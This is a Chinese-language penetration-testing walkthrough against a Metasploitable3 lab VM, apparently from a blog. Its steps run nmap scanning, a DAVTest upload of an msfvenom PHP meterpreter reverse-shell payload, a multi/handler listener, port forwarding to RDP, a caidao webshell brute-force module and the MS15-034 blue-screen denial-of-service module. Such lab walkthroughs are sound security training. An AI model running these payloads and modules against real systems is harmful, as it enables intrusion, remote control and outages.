metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。

metasploitable2配合metasploit的模块进行使用,速度很快。

metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。

一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。

以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址

推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html    这是对win7系统的攻击

面对靶机时,踩点:nmap网络扫描工具      【kali nmap的使用】

nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151      【内网靶机不需要解析DNS】

扫描结果关注到8585端口   存在 http   php   dav等应用     【对扫描结果的解读】

DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。      【漏洞测试】

msfvenom -p php/meterpreter_reverse_tcp  LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php    【生成反向链接攻击载荷,后门】

msfconsole                   【生成载荷以后,本地也要启动服务】

msf > use exploit/multi/handler                          【生成载荷以后,本地也要启动服务】

set PAYLOAD php/meterpreter_reverse_tcp              【生成载荷以后,本地也要启动服务】

show options                     【看一些设置有些什么东西】

set LHOST 192.168.1.152

set LPORT 5555                【设置一下,跟载荷对应上】

davtest               【看一下帮助信息,用于生成以下命令】

davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php  【上传攻击载荷到靶机】

exploit         【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】

help      【看一下meterpreter的帮助信息】

shell       【跟dos命令差不多】

rdesktop 192.168.1.151:3389           【手动链接一下远程桌面,看看有没有防火墙】

portfwd -h           【看一下meterpreter的端口转发帮助信息】

portfwd add -l 7777 -p 3389 -r 192.168.1.151       【将本机的7777端口转发到目标机的3389端口】

rdesktop   127.0.0.1:7777                【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】

meterpreter > background       【退出】

msf exploit(handler) >  back    【退出】

msf > services

msf > workspace  -a davtest     【创建一个工作区】

msf > db_                【看一下数据库功能】

msf > db_import demon.xml   【数据库导入看一下扫描结果的报告】

msf > services  【看一下扫描结果的报告】

ssh -L 3389:loaclhost:3389 vagrant@192.168.1.151       【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】

nmap -p 3389 192.168.1.151           【扫描一下3389】

nmap -p 3389 127.0.0.1         【扫描一下本机的3389】

rdesktop   127.0.0.1:3389        【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】

官方wiki      无语了,中国菜刀都被他们看见了。

https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

1.chinese caidao   ----中国菜刀,加入了中国菜刀元素:一句话木马       位置:http://localhost/caidao.asp

2.80端口 --http    MS15-034/CVE-2015-1635  HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)

微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响

模块位置   msf:use  auxiliary/dos/http/ms15_034_ulonglongadd

进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。

【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】

msf > search caidao                 【漏洞利用模块举例】

msf > use auxiliary/scanner/http/caidao_bruteforce_login                  【菜刀扫描模块】

show options       【查看设置】

set RHOSTS 192.168.1.151          【设置目标机】

set THREADS 10   【设置线程】

set TARGETURI /caidao.asp

run

search ms 15_034      【搜索远程蓝屏代码漏洞编号】

use auxiliary/dos/http/ms15_034_ulonglongadd          【执行蓝屏代码漏洞的载荷模块】

show options

set RHOSTS 192.168.1.151

exploit             【服务器马上蓝屏】

其他参考资料

hacking metasploitable 2

http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1

MSF精华合集      ZANYAR MATRIX发布的

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10

书籍

菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞

T00LS metasploit  第一季度 第二季   ---羽翼

5期-Metasploitable3专题课程的更多相关文章

  1. 最新linux运维高级架构课13期 架构师课程

    有会员购买的,分享给大家.完整一套,可以学习一下.     ├─L001-2017linux运维高级架构师13期-运维与自动化运维发展-10节 │      1-1运维职业发展.avi │      ...

  2. 图灵学院java架构师vip课程第二期 完整版课程下载 无加密

    部分目录2020年新图灵学院Java二期架构师教程下载[课程目录]├──一.VIP课程:互联网工程专题├──二.VIP课程:源码框架专题├──三.VIP课程:并发编程专题├──四.VIP课程:性能调优 ...

  3. python22期第一天(课程总结)

    1.Python介绍: python是一门高级编程语言,涉及领域比较广泛,社区活跃,由一个核心开发团队在维护,相对其他语言,易于学习,可移植性强,可扩展性强,易于维护,有大量的标准库可供使用. 2.P ...

  4. 最新咕咆+鲁班+图灵+享学+蚂蚁+硅谷+源码 Java架构师资料《Java架构师VIP课程》

    最新的Java架构师完整资料,完整视频+源码+文档. 每一套都是一百多个G的资料,无密. JAVA架构师全套课程 咕泡学院互联网架构师第一期 咕泡学院互联网架构师第二期 咕泡学院互联网架构师第三期 博 ...

  5. iOS移动开发周报-第25期

    iOS移动开发周报-第25期 [摘要]:本期iOS移动开发周报带来如下内容:苹果发布 iPhone6 和 Apple Watch.Swift 1.0 GM发布.Xcode 6支持PDF Vector作 ...

  6. MSDN Webcast 系列课程

    云计算(Cloud) 云起龙骧系列课程 网络开发(Web) ASP.NET 4 风云之旅系列课程 ASP.NET 开发实践系列课程 MOSS2007 最佳实战 StepByStep 系列课程 Silv ...

  7. Web前端开发推荐阅读书籍、学习课程下载

    转自http://www.xuanfengge.com/fe-books.html 前言 学校里没有前端的课程,那如何学习JavaScript,又如何使自己成为一个合格的前端工程师呢? 除了在项目中学 ...

  8. day81:luffy:课程分类页面&课程信息页面&指定分类显示课程信息&分页显示课程信息

    目录 1.构建课程前端初始页面 2.course后端的准备工作 3.后端实现课程分类列表接口 4.前端发送请求-获取课程分类信息 5.后端实现课程列表信息的接口 6.前端显示列表课程信息 7.按照指定 ...

  9. Django之Model

    一.字段 常用字段: AutoField:int自增列,必须填入参数 primary_key=True.当model中如果没有自增列,则自动会创建一个列名为id的列. IntergerField:一个 ...

随机推荐

  1. 问题 E: Jack的A+B

    问题 E: Jack的A+B 时间限制: 1 Sec  内存限制: 128 MB提交: 1996  解决: 601[提交] [状态] [命题人:jsu_admin] 题目描述 现在有整数a,b,请按西 ...

  2. Neo4j 不区分大小写的模糊查询匹配

    问题:当图数据库中存储的节点的名字为英文时,就会遇到大小写不匹配问题. 使用不区分大小写的正则表示式可以解决以上问题. Cpyher的where语法里支持正则表达式 ,其语法为 :   =~ &quo ...

  3. 【Matlab技巧】工作区变量如何添加到Simulink中?

    对新手来说,在进行simulink仿真时想把工作区的变量添加到Simulink中,这样在如transfer模块中使用时可以直接输变量即可. 如这样: 那么如何对Simulink仿真文件自动赋值呢? 1 ...

  4. DAG

    DAG的生成 DAG(Directed Acyclic Graph) 叫做有向无环图,原始的RDD通过一系列的转换就形成了DAG,根据RDD之间的依赖关系的不同将DAG划分成不同的Stage,对于窄依 ...

  5. 第二讲shiro异常及执行流程

    在认证过程中,有一个父异常为:AuthenticationException 该异常有几个子类,分别对应不同的异常情况: (1)DisabledAccountException:账户失效异常 (2)E ...

  6. c# 读取二进制文件并转换为 16 进制显示

    string result = ""; string filePath = "xxx.bin"; if (File.Exists(filePath)) { by ...

  7. ORI-621龙芯3A处理器CPCI刀片计算机

    ORI-621龙芯3A处理器CPCI刀片计算机 一.产品简介 ORI -621是一款基于龙芯3A国产CPU处理器的特种CPCI刀片计算机.该产品成功地实现了服务器NUMA架构在国产特种计算机中的应用, ...

  8. Linux性能优化从入门到实战:04 CPU篇:CPU使用率

      CPU使用率是单位时间内CPU使用情况的统计,以百分比方式展示. $ top top - 11:46:45 up 7 days, 11:52, 1 user, load average: 0.00 ...

  9. uboot移植之迷雾解码

    按照蜗窝科技的步骤执行 一.有关硬件描述的填空题 1)CPU上电后,从哪种设备(       BOOTROM         )的哪个地址(        0x0000_0000       )开始执 ...

  10. mona!mona!mona!

    $ PS: $ 关于\(mona\) 是只很棒的猫啦!想知道的可以自己去看\(persona5\)的游戏流程或者动画版啦. \(PPS:\) 补充一下设定啊,\(mona\)是摩尔加纳(原名)的代号啦 ...